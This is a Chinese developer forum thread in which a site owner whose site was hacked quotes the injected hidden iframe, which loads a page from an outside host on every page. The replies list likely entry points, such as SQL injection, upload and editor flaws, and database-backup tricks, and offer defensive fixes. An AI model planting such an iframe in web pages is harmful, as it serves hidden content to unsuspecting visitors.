28,390
社区成员
发帖
与我相关
我的任务
分享网站被黑,求原因,被注入代码如下
<iframe src=http://www.cctv916.com:555/shouj.htm width=100 height=0></iframe><html>
网站每个页面都有这个,包括后台登录页面。求大神解答
...全文
请发表友善的回复…
发表回复
大瓶药水 2019-02-25
- 打赏
- 举报
被注入了,看日志吧
amotenjf 2019-02-03
- 打赏
- 举报
如果网站是用的开源的程序,最好能自己改改敏感文件的命名方式,尽可能的在正常可访问的页面中隐藏敏感的页面(比如上传类,后台登陆,数据库备份功能,富文本编辑器-尽量别暴漏,原开源程序中有而目前用不到的页面尽可能删掉)。个人之前ASP经常被干,都干出阴影了,程序上的漏洞无法一一修复,只能在被黑难度上下功夫,祝你好运。
amotenjf 2019-02-03
- 打赏
- 举报
可以判断是批量写进去的,没准asp木马还在站点中,检查有没有未知文件,多数这种漏洞都是上传方面,首先是编辑器漏洞,编辑器文件图片上传,第二就是无组件上传类漏洞,被利用用于上传恶意文件(例如一句话图片木马),再就是asp数据库备份漏洞,可以将伪装成图片格式的文件备份成可执行文件(.asp、.asa),网站如果没有做防注入措施,容易被人暴库,从而知道网站后台用户名密码,进一步了解网站结构,如果能做好防注入措施,再没有用开源或者大幅度调整过文件命名的情况下,菜鸟黑客还是拿你没办法的,对方不了解,也没有地方窥探网站文件结构,单靠软件去试着找上传或者漏洞入口,所浪费的时间,还不如放弃换个站搞。
ziyuanxian 2018-06-20
- 打赏
- 举报
装个安全狗,看看是从哪个网页注入或上传的,最好post或者get过滤下sql关键字,更安全点。你这个已经被修改了,先清除代码,然后。找安全漏洞,装个安全狗,看看是从哪个网页注入或上传的
「已注销」 2018-06-17
- 打赏
- 举报
求注入方法!
学习a123456 2018-05-14
- 打赏
- 举报
服务器本身没有设置好,有安全软件可以让文件不许浏览器访问方式修改
Tanyz 2018-04-07
- 打赏
- 举报
360官方有提供一个防注入的模块,你可以找找,插入自己的代码中就行了。
Tiny~ 2018-03-21
- 打赏
- 举报
要么是sql注入,这个你可以加判断代码,如果是能控制的云主机或者VPS、单独的服务器,最简单的办法安装服务器狗试试
要么就是最常见的,上传组件有问题。比方说你后台编辑器的上传组件,或者你添加到后台的其他上传文件的无组件上传类,如果本身就有漏洞,你又没有至少添加下session验证在相关文件里面,最容易中招……
阿三阿四一起来 2017-11-18
- 打赏
- 举报
这个应该是SQL注入造成的,做一下SQL注入防护或加强上传文件的检测权限
区区小爱 2017-11-16
- 打赏
- 举报
你的是不是服务器问题?
liminhao520 2017-11-16
- 打赏
- 举报
检查服务器,重新搭建环境
什么都不能 2017-11-15
- 打赏
- 举报
1.检查sql注入
2.检查木马文件
3.你的站点是不是放到租用的空间里?还要看看是不是被旁注了。
lifewell1 2017-10-17
- 打赏
- 举报
输入框防代码注入
sspanzervor1 2017-10-16
- 打赏
- 举报
最根本的解决办法是要装个服务器防火墙
gtr 2017-10-16
- 打赏
- 举报
检查一下代码的漏洞。建议不要用人家的代码,
jilongkeng1819 2017-05-04
- 打赏
- 举报
11111111111
小伙真帅 2017-05-03
- 打赏
- 举报
SQL注入,上传,权限控制.
简单后台地址或帐号密码,
服务器沦陷.
代码中本身就还存在马儿没清干净.
说实话,太多太多.
Rotel-刘志东 2017-04-14
- 打赏
- 举报
代码层面是否做了sql过滤
chinashiji 2017-04-14
- 打赏
- 举报
sql注入,确定就这个原因
chx090909 2017-04-06
- 打赏
- 举报
编辑器漏洞?上传漏洞?基本上多半都是上传漏洞。。。
把放上传文件的文件夹的运行脚本程序功能去掉试试?
加载更多回复(11)
